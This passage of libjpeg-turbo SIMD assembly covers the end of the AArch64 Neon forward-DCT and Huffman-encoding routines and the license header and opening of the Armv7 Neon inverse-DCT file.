smlal v22.4s, v11.4h, XFIX_N_1_847 /* lo z1 + MULTIPLY(tmp12, XFIX_N_1_847) */
smlal2 v25.4s, v11.8h, XFIX_N_1_847 /* hi z1 + MULTIPLY(tmp12, XFIX_N_1_847) */
rshrn v18.4h, v18.4s, #DESCALE_P2
rshrn v22.4h, v22.4s, #DESCALE_P2
rshrn2 v18.8h, v24.4s, #DESCALE_P2 /* dataptr[2] = (DCTELEM)DESCALE(z1 + MULTIPLY(tmp13, XFIX_P_0_765), CONST_BITS-PASS1_BITS); */
rshrn2 v22.8h, v25.4s, #DESCALE_P2 /* dataptr[6] = (DCTELEM)DESCALE(z1 + MULTIPLY(tmp12, XFIX_N_1_847), CONST_BITS-PASS1_BITS); */
/* Odd part */
add v8.8h, v28.8h, v31.8h /* z1 = tmp4 + tmp7; */
add v9.8h, v29.8h, v30.8h /* z2 = tmp5 + tmp6; */
add v10.8h, v28.8h, v30.8h /* z3 = tmp4 + tmp6; */
add v11.8h, v29.8h, v31.8h /* z4 = tmp5 + tmp7; */
smull v4.4s, v10.4h, XFIX_P_1_175 /* z5 lo = z3 lo * XFIX_P_1_175 */
smull2 v5.4s, v10.8h, XFIX_P_1_175
smlal v4.4s, v11.4h, XFIX_P_1_175 /* z5 = MULTIPLY(z3 + z4, FIX_1_175875602); */
smlal2 v5.4s, v11.8h, XFIX_P_1_175
smull2 v24.4s, v28.8h, XFIX_P_0_298
smull2 v25.4s, v29.8h, XFIX_P_2_053
smull2 v26.4s, v30.8h, XFIX_P_3_072
smull2 v27.4s, v31.8h, XFIX_P_1_501
smull v28.4s, v28.4h, XFIX_P_0_298 /* tmp4 = MULTIPLY(tmp4, FIX_0_298631336); */
smull v29.4s, v29.4h, XFIX_P_2_053 /* tmp5 = MULTIPLY(tmp5, FIX_2_053119869); */
smull v30.4s, v30.4h, XFIX_P_3_072 /* tmp6 = MULTIPLY(tmp6, FIX_3_072711026); */
smull v31.4s, v31.4h, XFIX_P_1_501 /* tmp7 = MULTIPLY(tmp7, FIX_1_501321110); */
smull2 v12.4s, v8.8h, XFIX_N_0_899
smull2 v13.4s, v9.8h, XFIX_N_2_562
smull2 v14.4s, v10.8h, XFIX_N_1_961
smull2 v15.4s, v11.8h, XFIX_N_0_390
smull v8.4s, v8.4h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223); */
smull v9.4s, v9.4h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447); */
smull v10.4s, v10.4h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560); */
smull v11.4s, v11.4h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644); */
add v10.4s, v10.4s, v4.4s
add v14.4s, v14.4s, v5.4s
add v11.4s, v11.4s, v4.4s
add v15.4s, v15.4s, v5.4s
add v28.4s, v28.4s, v8.4s /* tmp4 += z1 */
add v24.4s, v24.4s, v12.4s
add v29.4s, v29.4s, v9.4s /* tmp5 += z2 */
add v25.4s, v25.4s, v13.4s
add v30.4s, v30.4s, v10.4s /* tmp6 += z3 */
add v26.4s, v26.4s, v14.4s
add v31.4s, v31.4s, v11.4s /* tmp7 += z4 */
add v27.4s, v27.4s, v15.4s
add v28.4s, v28.4s, v10.4s /* tmp4 += z3 */
add v24.4s, v24.4s, v14.4s
add v29.4s, v29.4s, v11.4s /* tmp5 += z4 */
add v25.4s, v25.4s, v15.4s
add v30.4s, v30.4s, v9.4s /* tmp6 += z2 */
add v26.4s, v26.4s, v13.4s
add v31.4s, v31.4s, v8.4s /* tmp7 += z1 */
add v27.4s, v27.4s, v12.4s
rshrn v23.4h, v28.4s, #DESCALE_P2
rshrn v21.4h, v29.4s, #DESCALE_P2
rshrn v19.4h, v30.4s, #DESCALE_P2
rshrn v17.4h, v31.4s, #DESCALE_P2
rshrn2 v23.8h, v24.4s, #DESCALE_P2 /* dataptr[7] = (DCTELEM)DESCALE(tmp4 + z1 + z3, CONST_BITS-PASS1_BITS); */
rshrn2 v21.8h, v25.4s, #DESCALE_P2 /* dataptr[5] = (DCTELEM)DESCALE(tmp5 + z2 + z4, CONST_BITS-PASS1_BITS); */
rshrn2 v19.8h, v26.4s, #DESCALE_P2 /* dataptr[3] = (DCTELEM)DESCALE(tmp6 + z2 + z3, CONST_BITS-PASS1_BITS); */
rshrn2 v17.8h, v27.4s, #DESCALE_P2 /* dataptr[1] = (DCTELEM)DESCALE(tmp7 + z1 + z4, CONST_BITS-PASS1_BITS); */
/* store results */
st1 {v16.8h, v17.8h, v18.8h, v19.8h}, [DATA], 64
st1 {v20.8h, v21.8h, v22.8h, v23.8h}, [DATA]
/* Restore Neon registers */
ld1 {v8.8b, v9.8b, v10.8b, v11.8b}, [sp], 32
ld1 {v12.8b, v13.8b, v14.8b, v15.8b}, [sp], 32
br x30
.unreq DATA
.unreq TMP
#undef XFIX_P_0_298
#undef XFIX_N_0_390
#undef XFIX_P_0_541
#undef XFIX_P_0_765
#undef XFIX_N_0_899
#undef XFIX_P_1_175
#undef XFIX_P_1_501
#undef XFIX_N_1_847
#undef XFIX_N_1_961
#undef XFIX_P_2_053
#undef XFIX_N_2_562
#undef XFIX_P_3_072
/*****************************************************************************/
/*
* GLOBAL(JOCTET *)
* jsimd_huff_encode_one_block(working_state *state, JOCTET *buffer,
* JCOEFPTR block, int last_dc_val,
* c_derived_tbl *dctbl, c_derived_tbl *actbl)
*
*/
BUFFER .req x1
PUT_BUFFER .req x6
PUT_BITS .req x7
PUT_BITSw .req w7
.macro emit_byte
sub PUT_BITS, PUT_BITS, #0x8
lsr x19, PUT_BUFFER, PUT_BITS
uxtb w19, w19
strb w19, [BUFFER, #1]!
cmp w19, #0xff
b.ne 14f
strb wzr, [BUFFER, #1]!
14:
.endm
.macro put_bits CODE, SIZE
lsl PUT_BUFFER, PUT_BUFFER, \SIZE
add PUT_BITS, PUT_BITS, \SIZE
orr PUT_BUFFER, PUT_BUFFER, \CODE
.endm
.macro checkbuf31
cmp PUT_BITS, #0x20
b.lt 31f
emit_byte
emit_byte
emit_byte
emit_byte
31:
.endm
.macro checkbuf47
cmp PUT_BITS, #0x30
b.lt 47f
emit_byte
emit_byte
emit_byte
emit_byte
emit_byte
emit_byte
47:
.endm
.macro generate_jsimd_huff_encode_one_block fast_tbl
.if \fast_tbl == 1
asm_function jsimd_huff_encode_one_block_neon
.else
asm_function jsimd_huff_encode_one_block_neon_slowtbl
.endif
sub sp, sp, 272
sub BUFFER, BUFFER, #0x1 /* BUFFER=buffer-- */
/* Save Arm registers */
stp x19, x20, [sp]
get_symbol_loc x15, Ljsimd_huff_encode_one_block_neon_consts
ldr PUT_BUFFER, [x0, #0x10]
ldr PUT_BITSw, [x0, #0x18]
ldrsh w12, [x2] /* load DC coeff in w12 */
/* prepare data */
.if \fast_tbl == 1
ld1 {v23.16b}, [x15], #16
ld1 {v0.16b, v1.16b, v2.16b, v3.16b}, [x15], #64
ld1 {v4.16b, v5.16b, v6.16b, v7.16b}, [x15], #64
ld1 {v16.16b, v17.16b, v18.16b, v19.16b}, [x15], #64
ld1 {v24.16b, v25.16b, v26.16b, v27.16b}, [x2], #64
ld1 {v28.16b, v29.16b, v30.16b, v31.16b}, [x2], #64
sub w12, w12, w3 /* last_dc_val, not used afterwards */
/* ZigZag 8x8 */
tbl v0.16b, {v24.16b, v25.16b, v26.16b, v27.16b}, v0.16b
tbl v1.16b, {v24.16b, v25.16b, v26.16b, v27.16b}, v1.16b
tbl v2.16b, {v25.16b, v26.16b, v27.16b, v28.16b}, v2.16b
tbl v3.16b, {v24.16b, v25.16b, v26.16b, v27.16b}, v3.16b
tbl v4.16b, {v28.16b, v29.16b, v30.16b, v31.16b}, v4.16b
tbl v5.16b, {v25.16b, v26.16b, v27.16b, v28.16b}, v5.16b
tbl v6.16b, {v27.16b, v28.16b, v29.16b, v30.16b}, v6.16b
tbl v7.16b, {v29.16b, v30.16b, v31.16b}, v7.16b
ins v0.h[0], w12
tbx v1.16b, {v28.16b}, v16.16b
tbx v2.16b, {v29.16b, v30.16b}, v17.16b
tbx v5.16b, {v29.16b, v30.16b}, v18.16b
tbx v6.16b, {v31.16b}, v19.16b
.else
add x13, x2, #0x22
sub w12, w12, w3 /* last_dc_val, not used afterwards */
ld1 {v23.16b}, [x15]
add x14, x2, #0x18
add x3, x2, #0x36
ins v0.h[0], w12
add x9, x2, #0x2
ld1 {v1.h}[0], [x13]
add x15, x2, #0x30
ld1 {v2.h}[0], [x14]
add x19, x2, #0x26
ld1 {v3.h}[0], [x3]
add x20, x2, #0x28
ld1 {v0.h}[1], [x9]
add x12, x2, #0x10
ld1 {v1.h}[1], [x15]
add x13, x2, #0x40
ld1 {v2.h}[1], [x19]
add x14, x2, #0x34
ld1 {v3.h}[1], [x20]
add x3, x2, #0x1a
ld1 {v0.h}[2], [x12]
add x9, x2, #0x20
ld1 {v1.h}[2], [x13]
add x15, x2, #0x32
ld1 {v2.h}[2], [x14]
add x19, x2, #0x42
ld1 {v3.h}[2], [x3]
add x20, x2, #0xc
ld1 {v0.h}[3], [x9]
add x12, x2, #0x12
ld1 {v1.h}[3], [x15]
add x13, x2, #0x24
ld1 {v2.h}[3], [x19]
add x14, x2, #0x50
ld1 {v3.h}[3], [x20]
add x3, x2, #0xe
ld1 {v0.h}[4], [x12]
add x9, x2, #0x4
ld1 {v1.h}[4], [x13]
add x15, x2, #0x16
ld1 {v2.h}[4], [x14]
add x19, x2, #0x60
ld1 {v3.h}[4], [x3]
add x20, x2, #0x1c
ld1 {v0.h}[5], [x9]
add x12, x2, #0x6
ld1 {v1.h}[5], [x15]
add x13, x2, #0x8
ld1 {v2.h}[5], [x19]
add x14, x2, #0x52
ld1 {v3.h}[5], [x20]
add x3, x2, #0x2a
ld1 {v0.h}[6], [x12]
add x9, x2, #0x14
ld1 {v1.h}[6], [x13]
add x15, x2, #0xa
ld1 {v2.h}[6], [x14]
add x19, x2, #0x44
ld1 {v3.h}[6], [x3]
add x20, x2, #0x38
ld1 {v0.h}[7], [x9]
add x12, x2, #0x46
ld1 {v1.h}[7], [x15]
add x13, x2, #0x3a
ld1 {v2.h}[7], [x19]
add x14, x2, #0x74
ld1 {v3.h}[7], [x20]
add x3, x2, #0x6a
ld1 {v4.h}[0], [x12]
add x9, x2, #0x54
ld1 {v5.h}[0], [x13]
add x15, x2, #0x2c
ld1 {v6.h}[0], [x14]
add x19, x2, #0x76
ld1 {v7.h}[0], [x3]
add x20, x2, #0x78
ld1 {v4.h}[1], [x9]
add x12, x2, #0x62
ld1 {v5.h}[1], [x15]
add x13, x2, #0x1e
ld1 {v6.h}[1], [x19]
add x14, x2, #0x68
ld1 {v7.h}[1], [x20]
add x3, x2, #0x7a
ld1 {v4.h}[2], [x12]
add x9, x2, #0x70
ld1 {v5.h}[2], [x13]
add x15, x2, #0x2e
ld1 {v6.h}[2], [x14]
add x19, x2, #0x5a
ld1 {v7.h}[2], [x3]
add x20, x2, #0x6c
ld1 {v4.h}[3], [x9]
add x12, x2, #0x72
ld1 {v5.h}[3], [x15]
add x13, x2, #0x3c
ld1 {v6.h}[3], [x19]
add x14, x2, #0x4c
ld1 {v7.h}[3], [x20]
add x3, x2, #0x5e
ld1 {v4.h}[4], [x12]
add x9, x2, #0x64
ld1 {v5.h}[4], [x13]
add x15, x2, #0x4a
ld1 {v6.h}[4], [x14]
add x19, x2, #0x3e
ld1 {v7.h}[4], [x3]
add x20, x2, #0x6e
ld1 {v4.h}[5], [x9]
add x12, x2, #0x56
ld1 {v5.h}[5], [x15]
add x13, x2, #0x58
ld1 {v6.h}[5], [x19]
add x14, x2, #0x4e
ld1 {v7.h}[5], [x20]
add x3, x2, #0x7c
ld1 {v4.h}[6], [x12]
add x9, x2, #0x48
ld1 {v5.h}[6], [x13]
add x15, x2, #0x66
ld1 {v6.h}[6], [x14]
add x19, x2, #0x5c
ld1 {v7.h}[6], [x3]
add x20, x2, #0x7e
ld1 {v4.h}[7], [x9]
ld1 {v5.h}[7], [x15]
ld1 {v6.h}[7], [x19]
ld1 {v7.h}[7], [x20]
.endif
cmlt v24.8h, v0.8h, #0
cmlt v25.8h, v1.8h, #0
cmlt v26.8h, v2.8h, #0
cmlt v27.8h, v3.8h, #0
cmlt v28.8h, v4.8h, #0
cmlt v29.8h, v5.8h, #0
cmlt v30.8h, v6.8h, #0
cmlt v31.8h, v7.8h, #0
abs v0.8h, v0.8h
abs v1.8h, v1.8h
abs v2.8h, v2.8h
abs v3.8h, v3.8h
abs v4.8h, v4.8h
abs v5.8h, v5.8h
abs v6.8h, v6.8h
abs v7.8h, v7.8h
eor v24.16b, v24.16b, v0.16b
eor v25.16b, v25.16b, v1.16b
eor v26.16b, v26.16b, v2.16b
eor v27.16b, v27.16b, v3.16b
eor v28.16b, v28.16b, v4.16b
eor v29.16b, v29.16b, v5.16b
eor v30.16b, v30.16b, v6.16b
eor v31.16b, v31.16b, v7.16b
cmeq v16.8h, v0.8h, #0
cmeq v17.8h, v1.8h, #0
cmeq v18.8h, v2.8h, #0
cmeq v19.8h, v3.8h, #0
cmeq v20.8h, v4.8h, #0
cmeq v21.8h, v5.8h, #0
cmeq v22.8h, v6.8h, #0
xtn v16.8b, v16.8h
xtn v18.8b, v18.8h
xtn v20.8b, v20.8h
xtn v22.8b, v22.8h
umov w14, v0.h[0]
xtn2 v16.16b, v17.8h
umov w13, v24.h[0]
xtn2 v18.16b, v19.8h
clz w14, w14
xtn2 v20.16b, v21.8h
lsl w13, w13, w14
cmeq v17.8h, v7.8h, #0
sub w12, w14, #32
xtn2 v22.16b, v17.8h
lsr w13, w13, w14
and v16.16b, v16.16b, v23.16b
neg w12, w12
and v18.16b, v18.16b, v23.16b
add x3, x4, #0x400 /* r1 = dctbl->ehufsi */
and v20.16b, v20.16b, v23.16b
add x15, sp, #0x90 /* x15 = t2 */
and v22.16b, v22.16b, v23.16b
ldr w10, [x4, x12, lsl #2]
addp v16.16b, v16.16b, v18.16b
ldrb w11, [x3, x12]
addp v20.16b, v20.16b, v22.16b
checkbuf47
addp v16.16b, v16.16b, v20.16b
put_bits x10, x11
addp v16.16b, v16.16b, v18.16b
checkbuf47
umov x9, v16.D[0]
put_bits x13, x12
cnt v17.8b, v16.8b
mvn x9, x9
addv B18, v17.8b
add x4, x5, #0x400 /* x4 = actbl->ehufsi */
umov w12, v18.b[0]
lsr x9, x9, #0x1 /* clear AC coeff */
ldr w13, [x5, #0x3c0] /* x13 = actbl->ehufco[0xf0] */
rbit x9, x9 /* x9 = index0 */
ldrb w14, [x4, #0xf0] /* x14 = actbl->ehufsi[0xf0] */
cmp w12, #(64-8)
add x11, sp, #16
b.lt 4f
cbz x9, 6f
st1 {v0.8h, v1.8h, v2.8h, v3.8h}, [x11], #64
st1 {v4.8h, v5.8h, v6.8h, v7.8h}, [x11], #64
st1 {v24.8h, v25.8h, v26.8h, v27.8h}, [x11], #64
st1 {v28.8h, v29.8h, v30.8h, v31.8h}, [x11], #64
1:
clz x2, x9
add x15, x15, x2, lsl #1
lsl x9, x9, x2
ldrh w20, [x15, #-126]
2:
cmp x2, #0x10
b.lt 3f
sub x2, x2, #0x10
checkbuf47
put_bits x13, x14
b 2b
3:
clz w20, w20
ldrh w3, [x15, #2]!
sub w11, w20, #32
lsl w3, w3, w20
neg w11, w11
lsr w3, w3, w20
add x2, x11, x2, lsl #4
lsl x9, x9, #0x1
ldr w12, [x5, x2, lsl #2]
ldrb w10, [x4, x2]
checkbuf31
put_bits x12, x10
put_bits x3, x11
cbnz x9, 1b
b 6f
4:
movi v21.8h, #0x0010
clz v0.8h, v0.8h
clz v1.8h, v1.8h
clz v2.8h, v2.8h
clz v3.8h, v3.8h
clz v4.8h, v4.8h
clz v5.8h, v5.8h
clz v6.8h, v6.8h
clz v7.8h, v7.8h
ushl v24.8h, v24.8h, v0.8h
ushl v25.8h, v25.8h, v1.8h
ushl v26.8h, v26.8h, v2.8h
ushl v27.8h, v27.8h, v3.8h
ushl v28.8h, v28.8h, v4.8h
ushl v29.8h, v29.8h, v5.8h
ushl v30.8h, v30.8h, v6.8h
ushl v31.8h, v31.8h, v7.8h
neg v0.8h, v0.8h
neg v1.8h, v1.8h
neg v2.8h, v2.8h
neg v3.8h, v3.8h
neg v4.8h, v4.8h
neg v5.8h, v5.8h
neg v6.8h, v6.8h
neg v7.8h, v7.8h
ushl v24.8h, v24.8h, v0.8h
ushl v25.8h, v25.8h, v1.8h
ushl v26.8h, v26.8h, v2.8h
ushl v27.8h, v27.8h, v3.8h
ushl v28.8h, v28.8h, v4.8h
ushl v29.8h, v29.8h, v5.8h
ushl v30.8h, v30.8h, v6.8h
ushl v31.8h, v31.8h, v7.8h
add v0.8h, v21.8h, v0.8h
add v1.8h, v21.8h, v1.8h
add v2.8h, v21.8h, v2.8h
add v3.8h, v21.8h, v3.8h
add v4.8h, v21.8h, v4.8h
add v5.8h, v21.8h, v5.8h
add v6.8h, v21.8h, v6.8h
add v7.8h, v21.8h, v7.8h
st1 {v0.8h, v1.8h, v2.8h, v3.8h}, [x11], #64
st1 {v4.8h, v5.8h, v6.8h, v7.8h}, [x11], #64
st1 {v24.8h, v25.8h, v26.8h, v27.8h}, [x11], #64
st1 {v28.8h, v29.8h, v30.8h, v31.8h}, [x11], #64
1:
clz x2, x9
add x15, x15, x2, lsl #1
lsl x9, x9, x2
ldrh w11, [x15, #-126]
2:
cmp x2, #0x10
b.lt 3f
sub x2, x2, #0x10
checkbuf47
put_bits x13, x14
b 2b
3:
ldrh w3, [x15, #2]!
add x2, x11, x2, lsl #4
lsl x9, x9, #0x1
ldr w12, [x5, x2, lsl #2]
ldrb w10, [x4, x2]
checkbuf31
put_bits x12, x10
put_bits x3, x11
cbnz x9, 1b
6:
add x13, sp, #0x10e
cmp x15, x13
b.hs 1f
ldr w12, [x5]
ldrb w14, [x4]
checkbuf47
put_bits x12, x14
1:
str PUT_BUFFER, [x0, #0x10]
str PUT_BITSw, [x0, #0x18]
ldp x19, x20, [sp], 16
add x0, BUFFER, #0x1
add sp, sp, 256
br x30
.endm
generate_jsimd_huff_encode_one_block 1
generate_jsimd_huff_encode_one_block 0
.unreq BUFFER
.unreq PUT_BUFFER
.unreq PUT_BITS
.unreq PUT_BITSw
.purgem emit_byte
.purgem put_bits
.purgem checkbuf31
.purgem checkbuf47
|
open-vela/external_libjpeg-turbo | 43,740 | simd/arm/aarch32/jsimd_neon.S | /*
* Armv7 Neon optimizations for libjpeg-turbo
*
* Copyright (C) 2009-2011, Nokia Corporation and/or its subsidiary(-ies).
* All Rights Reserved.
* Author: Siarhei Siamashka <siarhei.siamashka@nokia.com>
* Copyright (C) 2014, Siarhei Siamashka. All Rights Reserved.
* Copyright (C) 2014, Linaro Limited. All Rights Reserved.
* Copyright (C) 2015, D. R. Commander. All Rights Reserved.
* Copyright (C) 2015-2016, 2018, Matthieu Darbois. All Rights Reserved.
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any damages
* arising from the use of this software.
*
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*/
#if defined(__linux__) && defined(__ELF__)
.section .note.GNU-stack, "", %progbits /* mark stack as non-executable */
#endif
.text
.fpu neon
.arch armv7a
.object_arch armv4
.arm
.syntax unified
/*****************************************************************************/
/* Supplementary macro for setting function attributes */
.macro asm_function fname
#ifdef __APPLE__
.private_extern _\fname
.globl _\fname
_\fname:
#else
.global \fname
#ifdef __ELF__
.hidden \fname
.type \fname, %function
#endif
\fname:
#endif
.endm
#define CENTERJSAMPLE 128
/*****************************************************************************/
/*
* Perform dequantization and inverse DCT on one block of coefficients.
*
* GLOBAL(void)
* jsimd_idct_islow_neon(void *dct_table, JCOEFPTR coef_block,
* JSAMPARRAY output_buf, JDIMENSION output_col)
*/
#define FIX_0_298631336 (2446)
#define FIX_0_390180644 (3196)
#define FIX_0_541196100 (4433)
#define FIX_0_765366865 (6270)
#define FIX_0_899976223 (7373)
#define FIX_1_175875602 (9633)
#define FIX_1_501321110 (12299)
#define FIX_1_847759065 (15137)
#define FIX_1_961570560 (16069)
#define FIX_2_053119869 (16819)
#define FIX_2_562915447 (20995)
#define FIX_3_072711026 (25172)
#define FIX_1_175875602_MINUS_1_961570560 (FIX_1_175875602 - FIX_1_961570560)
#define FIX_1_175875602_MINUS_0_390180644 (FIX_1_175875602 - FIX_0_390180644)
#define FIX_0_541196100_MINUS_1_847759065 (FIX_0_541196100 - FIX_1_847759065)
#define FIX_3_072711026_MINUS_2_562915447 (FIX_3_072711026 - FIX_2_562915447)
#define FIX_0_298631336_MINUS_0_899976223 (FIX_0_298631336 - FIX_0_899976223)
#define FIX_1_501321110_MINUS_0_899976223 (FIX_1_501321110 - FIX_0_899976223)
#define FIX_2_053119869_MINUS_2_562915447 (FIX_2_053119869 - FIX_2_562915447)
#define FIX_0_541196100_PLUS_0_765366865 (FIX_0_541196100 + FIX_0_765366865)
/*
* Reference SIMD-friendly 1-D ISLOW iDCT C implementation.
* Uses some ideas from the comments in 'simd/jiss2int-64.asm'
*/
#define REF_1D_IDCT(xrow0, xrow1, xrow2, xrow3, xrow4, xrow5, xrow6, xrow7) { \
DCTELEM row0, row1, row2, row3, row4, row5, row6, row7; \
JLONG q1, q2, q3, q4, q5, q6, q7; \
JLONG tmp11_plus_tmp2, tmp11_minus_tmp2; \
\
/* 1-D iDCT input data */ \
row0 = xrow0; \
row1 = xrow1; \
row2 = xrow2; \
row3 = xrow3; \
row4 = xrow4; \
row5 = xrow5; \
row6 = xrow6; \
row7 = xrow7; \
\
q5 = row7 + row3; \
q4 = row5 + row1; \
q6 = MULTIPLY(q5, FIX_1_175875602_MINUS_1_961570560) + \
MULTIPLY(q4, FIX_1_175875602); \
q7 = MULTIPLY(q5, FIX_1_175875602) + \
MULTIPLY(q4, FIX_1_175875602_MINUS_0_390180644); \
q2 = MULTIPLY(row2, FIX_0_541196100) + \
MULTIPLY(row6, FIX_0_541196100_MINUS_1_847759065); \
q4 = q6; \
q3 = ((JLONG)row0 - (JLONG)row4) << 13; \
q6 += MULTIPLY(row5, -FIX_2_562915447) + \
MULTIPLY(row3, FIX_3_072711026_MINUS_2_562915447); \
/* now we can use q1 (reloadable constants have been used up) */ \
q1 = q3 + q2; \
q4 += MULTIPLY(row7, FIX_0_298631336_MINUS_0_899976223) + \
MULTIPLY(row1, -FIX_0_899976223); \
q5 = q7; \
q1 = q1 + q6; \
q7 += MULTIPLY(row7, -FIX_0_899976223) + \
MULTIPLY(row1, FIX_1_501321110_MINUS_0_899976223); \
\
/* (tmp11 + tmp2) has been calculated (out_row1 before descale) */ \
tmp11_plus_tmp2 = q1; \
row1 = 0; \
\
q1 = q1 - q6; \
q5 += MULTIPLY(row5, FIX_2_053119869_MINUS_2_562915447) + \
MULTIPLY(row3, -FIX_2_562915447); \
q1 = q1 - q6; \
q6 = MULTIPLY(row2, FIX_0_541196100_PLUS_0_765366865) + \
MULTIPLY(row6, FIX_0_541196100); \
q3 = q3 - q2; \
\
/* (tmp11 - tmp2) has been calculated (out_row6 before descale) */ \
tmp11_minus_tmp2 = q1; \
\
q1 = ((JLONG)row0 + (JLONG)row4) << 13; \
q2 = q1 + q6; \
q1 = q1 - q6; \
\
/* pick up the results */ \
tmp0 = q4; \
tmp1 = q5; \
tmp2 = (tmp11_plus_tmp2 - tmp11_minus_tmp2) / 2; \
tmp3 = q7; \
tmp10 = q2; \
tmp11 = (tmp11_plus_tmp2 + tmp11_minus_tmp2) / 2; \
tmp12 = q3; \
tmp13 = q1; \
}
#define XFIX_0_899976223 d0[0]
#define XFIX_0_541196100 d0[1]
#define XFIX_2_562915447 d0[2]
#define XFIX_0_298631336_MINUS_0_899976223 d0[3]
#define XFIX_1_501321110_MINUS_0_899976223 d1[0]
#define XFIX_2_053119869_MINUS_2_562915447 d1[1]
#define XFIX_0_541196100_PLUS_0_765366865 d1[2]
#define XFIX_1_175875602 d1[3]
#define XFIX_1_175875602_MINUS_0_390180644 d2[0]
#define XFIX_0_541196100_MINUS_1_847759065 d2[1]
#define XFIX_3_072711026_MINUS_2_562915447 d2[2]
#define XFIX_1_175875602_MINUS_1_961570560 d2[3]
.balign 16
jsimd_idct_islow_neon_consts:
.short FIX_0_899976223 /* d0[0] */
.short FIX_0_541196100 /* d0[1] */
.short FIX_2_562915447 /* d0[2] */
.short FIX_0_298631336_MINUS_0_899976223 /* d0[3] */
.short FIX_1_501321110_MINUS_0_899976223 /* d1[0] */
.short FIX_2_053119869_MINUS_2_562915447 /* d1[1] */
.short FIX_0_541196100_PLUS_0_765366865 /* d1[2] */
.short FIX_1_175875602 /* d1[3] */
/* reloadable constants */
.short FIX_1_175875602_MINUS_0_390180644 /* d2[0] */
.short FIX_0_541196100_MINUS_1_847759065 /* d2[1] */
.short FIX_3_072711026_MINUS_2_562915447 /* d2[2] */
.short FIX_1_175875602_MINUS_1_961570560 /* d2[3] */
asm_function jsimd_idct_islow_neon
DCT_TABLE .req r0
COEF_BLOCK .req r1
OUTPUT_BUF .req r2
OUTPUT_COL .req r3
TMP1 .req r0
TMP2 .req r1
TMP3 .req r2
TMP4 .req ip
ROW0L .req d16
ROW0R .req d17
ROW1L .req d18
ROW1R .req d19
ROW2L .req d20
ROW2R .req d21
ROW3L .req d22
ROW3R .req d23
ROW4L .req d24
ROW4R .req d25
ROW5L .req d26
ROW5R .req d27
ROW6L .req d28
ROW6R .req d29
ROW7L .req d30
ROW7R .req d31
/* Load and dequantize coefficients into Neon registers
* with the following allocation:
* 0 1 2 3 | 4 5 6 7
* ---------+--------
* 0 | d16 | d17 ( q8 )
* 1 | d18 | d19 ( q9 )
* 2 | d20 | d21 ( q10 )
* 3 | d22 | d23 ( q11 )
* 4 | d24 | d25 ( q12 )
* 5 | d26 | d27 ( q13 )
* 6 | d28 | d29 ( q14 )
* 7 | d30 | d31 ( q15 )
*/
adr ip, jsimd_idct_islow_neon_consts
vld1.16 {d16, d17, d18, d19}, [COEF_BLOCK, :128]!
vld1.16 {d0, d1, d2, d3}, [DCT_TABLE, :128]!
vld1.16 {d20, d21, d22, d23}, [COEF_BLOCK, :128]!
vmul.s16 q8, q8, q0
vld1.16 {d4, d5, d6, d7}, [DCT_TABLE, :128]!
vmul.s16 q9, q9, q1
vld1.16 {d24, d25, d26, d27}, [COEF_BLOCK, :128]!
vmul.s16 q10, q10, q2
vld1.16 {d0, d1, d2, d3}, [DCT_TABLE, :128]!
vmul.s16 q11, q11, q3
vld1.16 {d28, d29, d30, d31}, [COEF_BLOCK, :128]
vmul.s16 q12, q12, q0
vld1.16 {d4, d5, d6, d7}, [DCT_TABLE, :128]!
vmul.s16 q14, q14, q2
vmul.s16 q13, q13, q1
vld1.16 {d0, d1, d2, d3}, [ip, :128] /* load constants */
add ip, ip, #16
vmul.s16 q15, q15, q3
vpush {d8 - d15} /* save Neon registers */
/* 1-D IDCT, pass 1, left 4x8 half */
vadd.s16 d4, ROW7L, ROW3L
vadd.s16 d5, ROW5L, ROW1L
vmull.s16 q6, d4, XFIX_1_175875602_MINUS_1_961570560
vmlal.s16 q6, d5, XFIX_1_175875602
vmull.s16 q7, d4, XFIX_1_175875602
/* Check for the zero coefficients in the right 4x8 half */
push {r4, r5}
vmlal.s16 q7, d5, XFIX_1_175875602_MINUS_0_390180644
vsubl.s16 q3, ROW0L, ROW4L
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 1 * 8))]
vmull.s16 q2, ROW2L, XFIX_0_541196100
vmlal.s16 q2, ROW6L, XFIX_0_541196100_MINUS_1_847759065
orr r0, r4, r5
vmov q4, q6
vmlsl.s16 q6, ROW5L, XFIX_2_562915447
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 2 * 8))]
vmlal.s16 q6, ROW3L, XFIX_3_072711026_MINUS_2_562915447
vshl.s32 q3, q3, #13
orr r0, r0, r4
vmlsl.s16 q4, ROW1L, XFIX_0_899976223
orr r0, r0, r5
vadd.s32 q1, q3, q2
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 3 * 8))]
vmov q5, q7
vadd.s32 q1, q1, q6
orr r0, r0, r4
vmlsl.s16 q7, ROW7L, XFIX_0_899976223
orr r0, r0, r5
vmlal.s16 q7, ROW1L, XFIX_1_501321110_MINUS_0_899976223
vrshrn.s32 ROW1L, q1, #11
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 4 * 8))]
vsub.s32 q1, q1, q6
vmlal.s16 q5, ROW5L, XFIX_2_053119869_MINUS_2_562915447
orr r0, r0, r4
vmlsl.s16 q5, ROW3L, XFIX_2_562915447
orr r0, r0, r5
vsub.s32 q1, q1, q6
vmull.s16 q6, ROW2L, XFIX_0_541196100_PLUS_0_765366865
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 5 * 8))]
vmlal.s16 q6, ROW6L, XFIX_0_541196100
vsub.s32 q3, q3, q2
orr r0, r0, r4
vrshrn.s32 ROW6L, q1, #11
orr r0, r0, r5
vadd.s32 q1, q3, q5
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 6 * 8))]
vsub.s32 q3, q3, q5
vaddl.s16 q5, ROW0L, ROW4L
orr r0, r0, r4
vrshrn.s32 ROW2L, q1, #11
orr r0, r0, r5
vrshrn.s32 ROW5L, q3, #11
